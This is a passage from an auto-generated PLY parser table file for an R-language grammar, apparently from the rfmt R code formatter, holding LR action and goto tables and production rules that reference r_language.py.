,17,17,17,17,17,17,17,17,17,17,]),'EQ':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,53,53,-18,-17,53,-63,53,-48,53,-58,53,-25,53,-14,-15,53,-29,-27,-28,-30,-22,-36,-41,53,-26,53,53,-38,-3,-40,-37,53,-39,-23,-24,53,53,53,-32,-31,53,-16,-71,53,53,53,53,-72,-65,-60,-62,-64,-61,]),'OR2':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,63,-19,-18,-17,-21,-63,-20,-48,63,-58,63,-25,63,-14,-15,63,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,63,-38,-3,-40,-37,-46,-39,-23,-24,-43,63,-47,-32,-31,-34,-16,-71,63,63,63,63,-72,-65,-60,-62,-64,-61,]),';':([1,7,9,10,11,15,16,17,19,20,22,23,26,28,29,31,37,69,70,71,72,78,80,81,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,139,141,142,143,146,147,],[7,7,-12,-10,7,7,-11,-13,-14,-15,-2,69,-19,-18,-17,-21,-63,7,7,-20,-48,-58,-25,-33,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-16,-71,-72,-65,-60,-62,-64,-61,]),'LEFT_ASSIGN':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,58,-19,-18,-17,58,-63,-20,-48,58,-58,58,-25,58,-14,-15,58,-29,-27,-28,-30,-22,-36,-41,58,-26,-42,58,-38,-3,-40,-37,58,-39,-23,-24,-43,58,-47,-32,-31,-34,-16,-71,58,58,58,58,-72,-65,-60,-62,-64,-61,]),'@':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,50,50,50,50,50,-63,50,-48,50,-58,50,-25,50,-14,-15,50,50,50,50,50,50,50,50,50,-26,50,50,50,-3,50,50,50,50,-23,-24,50,50,50,50,50,50,-16,-71,50,50,50,50,-72,-65,-60,-62,-64,-61,]),'LBB':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,56,56,56,56,56,-63,56,-48,56,-58,56,56,56,-14,-15,56,56,56,56,56,56,56,56,56,56,56,56,56,-3,56,56,56,56,56,56,56,56,56,56,56,56,-16,-71,56,56,56,56,-72,-65,-60,-62,-64,-61,]),']':([9,10,16,17,19,20,22,26,28,29,31,37,56,66,71,72,78,80,81,82,83,84,85,86,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,123,124,125,126,127,128,129,136,137,138,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,-2,-19,-18,-17,-21,-63,-49,-49,-20,-48,-58,-25,-33,-49,-14,-15,-53,-50,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,128,-37,-46,-39,-23,-24,-43,-45,-47,-32,129,-31,-34,-51,-56,-54,-49,-16,139,-71,-57,-55,-52,-72,-65,-60,-62,-64,-61,]),'^':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,67,67,67,67,67,-63,67,-48,67,-58,67,-25,67,-14,-15,67,67,67,67,67,67,67,67,67,-26,67,67,67,-3,67,67,67,67,-23,-24,67,67,67,67,67,67,-16,-71,67,67,67,67,-72,-65,-60,-62,-64,-61,]),'COMMENT':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,]),'FOR':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,]),'LBRACE':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,]),'NS_GET_INT':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,61,61,61,61,61,-63,61,-48,61,-58,61,61,61,-14,-15,61,61,61,61,61,61,61,61,61,61,61,61,61,-3,61,61,61,61,-23,-24,61,61,61,61,61,61,-16,-71,61,61,61,61,-72,-65,-60,-62,-64,-61,]),'$end':([1,2,7,9,10,11,16,17,19,20,22,23,24,26,28,29,30,31,32,37,69,70,71,72,78,80,81,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,115,116,127,129,139,141,142,143,146,147,],[-4,0,-4,-12,-10,-4,-11,-13,-14,-15,-2,-5,-1,-19,-18,-17,-7,-21,-6,-63,-4,-4,-20,-48,-58,-25,-33,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-9,-8,-16,-71,-72,-65,-60,-62,-64,-61,]),'STR_CONST':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,83,19,19,19,19,19,19,19,19,19,19,19,19,19,19,83,19,19,19,19,19,19,19,19,19,83,19,19,19,19,83,19,19,19,19,83,19,19,19,19,19,]),'BEGIN':([0,],[1,]),'RIGHT_ASSIGN':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,64,-19,-18,-17,64,-63,-20,-48,64,-58,64,-25,64,-14,-15,64,-29,-27,-28,-30,-22,-36,-41,64,-26,-42,64,-38,-3,-40,-37,64,-39,-23,-24,-43,64,-47,-32,-31,-34,-16,-71,64,64,64,64,-72,-65,-60,-62,-64,-61,]),'RBRACE':([7,9,10,11,15,16,17,19,20,22,23,26,28,29,30,31,32,36,37,69,70,71,72,78,80,81,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,115,116,127,129,139,141,142,143,146,147,],[-4,-12,-10,-4,-4,-11,-13,-14,-15,-2,-5,-19,-18,-17,-7,-21,-6,78,-63,-4,-4,-20,-48,-58,-25,-33,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,-44,-38,-3,-40,-37,-46,-39,-23,-24,-43,-45,-47,-32,-31,-34,-9,-8,-16,-71,-72,-65,-60,-62,-64,-61,]),'~':([1,3,4,5,6,7,8,9,10,11,15,16,17,18,19,20,22,25,26,28,29,31,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,77,78,79,80,81,82,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,117,118,124,125,126,127,129,130,131,133,134,135,136,137,139,141,142,143,144,145,146,147,],[25,25,25,25,25,25,25,-12,-10,25,25,-11,-13,25,-14,-15,68,25,-19,-18,-17,68,25,-63,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,-20,-48,68,-58,68,-25,68,25,-14,-15,68,-29,-27,-28,-30,-22,-36,-41,68,-26,-42,68,-38,-3,-40,-37,68,-39,-23,-24,-43,68,68,-32,-31,-34,25,25,25,25,25,-16,-71,68,68,25,25,25,68,68,-72,-65,-60,-62,25,25,-64,-61,]),'AND2':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,52,-19,-18,-17,-21,-63,-20,-48,52,-58,52,-25,52,-14,-15,52,-29,-27,-28,-30,-22,-36,-41,-35,-26,-42,52,-38,-3,-40,-37,-46,-39,-23,-24,-43,52,-47,-32,-31,-34,-16,-71,52,52,52,52,-72,-65,-60,-62,-64,-61,]),'SPECIAL':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,65,65,-18,-17,65,-63,65,-48,65,-58,65,-25,65,-14,-15,65,65,65,65,65,-22,65,65,65,-26,65,65,65,-3,65,65,65,65,-23,-24,65,65,65,-32,-31,65,-16,-71,65,65,65,65,-72,-65,-60,-62,-64,-61,]),'NS_GET':([9,10,16,17,19,20,22,26,28,29,31,37,71,72,77,78,79,80,81,83,84,85,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,113,114,127,129,130,131,136,137,139,141,142,143,146,147,],[-12,-10,-11,-13,-14,-15,60,60,60,60,60,-63,60,-48,60,-58,60,60,60,-14,-15,60,60,60,60,60,60,60,60,60,60,60,60,60,-3,60,60,60,60,-23,-24,60,60,60,60,60,60,-16,-71,60,60,60,60,-72,-65,-60,-62,-64,-61,]),'REPEAT':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,]),} _lr_action = { } for _k, _v in _lr_action_items.items(): for _x,_y in zip(_v[0],_v[1]): if not _x in _lr_action: _lr_action[_x] = { } _lr_action[_x][_k] = _y del _lr_action_items _lr_goto_items = {'prog':([0,],[2,]),'expr':([1,3,4,5,6,7,8,11,15,18,25,35,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,82,117,118,124,125,126,133,134,135,144,145,],[22,26,22,28,29,22,31,22,22,22,71,77,79,80,81,85,88,89,90,91,92,93,94,95,96,97,98,99,22,101,85,103,104,105,106,107,108,109,110,111,85,113,114,22,22,85,130,131,136,137,85,22,22,22,22,22,]),'eatlines':([76,77,79,130,],[120,121,122,140,]),'sublist':([41,56,66,82,126,],[87,102,112,123,138,]),'form':([34,119,],[75,75,]),'expr_or_assign':([1,4,7,11,15,18,54,69,70,133,134,135,144,145,],[23,27,23,23,23,37,100,23,23,141,142,143,146,147,]),'formlist':([34,119,],[76,132,]),'exprlist':([1,7,11,15,69,70,],[24,30,32,36,115,116,]),'sub':([41,56,66,82,126,],[86,86,86,86,86,]),} _lr_goto = { } for _k, _v in _lr_goto_items.items(): for _x,_y in zip(_v[0],_v[1]): if not _x in _lr_goto: _lr_goto[_x] = { } _lr_goto[_x][_k] = _y del _lr_goto_items _lr_productions = [ ("S' -> prog","S'",1,None,None,None), ('prog -> BEGIN exprlist','prog',2,'p_prog','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',783), ('expr_or_assign -> expr','expr_or_assign',1,'p_expr_or_assign','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',789), ('expr_or_assign -> expr EQ_ASSIGN expr_or_assign','expr_or_assign',3,'p_expr_or_assign','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',790), ('exprlist -> <empty>','exprlist',0,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',799), ('exprlist -> expr_or_assign','exprlist',1,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',800), ('exprlist -> CR exprlist','exprlist',2,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',801), ('exprlist -> ; exprlist','exprlist',2,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',802), ('exprlist -> expr_or_assign CR exprlist','exprlist',3,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',803), ('exprlist -> expr_or_assign ; exprlist','exprlist',3,'p_exprlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',804), ('expr -> COMMENT','expr',1,'p_expr_comment','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',825), ('expr -> NEXT','expr',1,'p_expr_atom','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',831), ('expr -> BREAK','expr',1,'p_expr_atom','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',832), ('expr -> NUM_CONST','expr',1,'p_expr_atom','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',833), ('expr -> STR_CONST','expr',1,'p_expr_atom','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',834), ('expr -> SYMBOL','expr',1,'p_expr_atom','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',835), ('expr -> expr ( sublist )','expr',4,'p_expr_function_call','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',841), ('expr -> - expr','expr',2,'p_expr_unop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',847), ('expr -> + expr','expr',2,'p_expr_unop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',848), ('expr -> ! expr','expr',2,'p_expr_unop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',849), ('expr -> ~ expr','expr',2,'p_expr_unop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',850), ('expr -> ? expr','expr',2,'p_expr_unop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',851), ('expr -> expr : expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',857), ('expr -> expr NS_GET expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',858), ('expr -> expr NS_GET_INT expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',859), ('expr -> expr $ expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',860), ('expr -> expr @ expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',861), ('expr -> expr + expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',862), ('expr -> expr - expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',863), ('expr -> expr * expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',864), ('expr -> expr / expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',865), ('expr -> expr ^ expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',866), ('expr -> expr SPECIAL expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',867), ('expr -> expr % expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',868), ('expr -> expr ~ expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',869), ('expr -> expr ? expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',870), ('expr -> expr < expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',871), ('expr -> expr LE expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',872), ('expr -> expr EQ expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',873), ('expr -> expr NE expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',874), ('expr -> expr GE expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',875), ('expr -> expr > expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',876), ('expr -> expr AND expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',877), ('expr -> expr OR expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',878), ('expr -> expr AND2 expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',879), ('expr -> expr OR2 expr','expr',3,'p_expr_binop','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',880), ('expr -> expr LEFT_ASSIGN expr','expr',3,'p_expr_assign','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',886), ('expr -> expr RIGHT_ASSIGN expr','expr',3,'p_expr_assign','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',887), ('expr -> ( expr_or_assign )','expr',3,'p_expr_paren','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',893), ('sublist -> <empty>','sublist',0,'p_sublist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',899), ('sublist -> sub','sublist',1,'p_sublist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',900), ('sublist -> , sublist','sublist',2,'p_sublist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',901), ('sublist -> sub , sublist','sublist',3,'p_sublist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',902), ('sub -> expr','sub',1,'p_sub','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',915), ('sub -> SYMBOL EQ_ASSIGN','sub',2,'p_sub','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',916), ('sub -> SYMBOL EQ_ASSIGN expr','sub',3,'p_sub','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',917), ('sub -> STR_CONST EQ_ASSIGN','sub',2,'p_sub','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',918), ('sub -> STR_CONST EQ_ASSIGN expr','sub',3,'p_sub','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',919), ('expr -> LBRACE exprlist RBRACE','expr',3,'p_expr_braced_block','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',928), ('eatlines -> <empty>','eatlines',0,'p_eatlines','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',934), ('expr -> IF ( expr eatlines ) expr_or_assign','expr',6,'p_expr_if_expr','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',940), ('expr -> IF ( expr eatlines ) expr_or_assign ELSE expr_or_assign','expr',8,'p_expr_if_else','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',946), ('expr -> WHILE ( expr eatlines ) expr_or_assign','expr',6,'p_expr_while','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',953), ('expr -> REPEAT expr_or_assign','expr',2,'p_expr_repeat','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',959), ('expr -> FOR ( SYMBOL IN expr eatlines ) expr_or_assign','expr',8,'p_expr_for_expr','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',965), ('expr -> FUNCTION ( formlist eatlines ) expr_or_assign','expr',6,'p_expr_function','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',973), ('formlist -> <empty>','formlist',0,'p_formlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',980), ('formlist -> form','formlist',1,'p_formlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',981), ('formlist -> form , 